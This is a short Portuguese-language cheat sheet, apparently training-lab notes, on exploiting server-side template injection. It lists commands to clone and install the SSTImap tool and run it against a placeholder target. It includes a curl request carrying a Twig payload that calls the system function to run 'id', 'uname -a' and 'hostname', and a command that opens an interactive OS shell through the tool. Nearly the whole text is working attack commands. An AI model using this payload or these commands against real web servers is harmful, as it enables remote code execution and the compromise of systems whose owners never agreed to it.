# SSTI Exploitation Example 1

| `git clone` [`https://github.com/vladko312/SSTImap.git`](https://github.com/vladko312/SSTImap.git) | Clonando o repositório sstimap  |
| -------------------------------------------------------------------------------------------------- | ------------------------------- |
| `cd sstimap`                                                                                       | Navegando para o novo diretório |
| `pip install -r requirements.txt`                                                                  | Instalando dependências         |
| `./sstimap.py -u 'http://<TARGET IP>:<PORT>' -d name=john`                                         | Executando tplmap no destino    |

**cURL - Interagindo com o alvo**

```shell-session
curl -X POST -d 'name={{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}' http://<TARGET IP>:<PORT>
```

**sstimap.py - OS Shell**

```shell-session
./sstimap.py -u 'http://<TARGET IP>:<PORT>' -d name=john --os-shell
```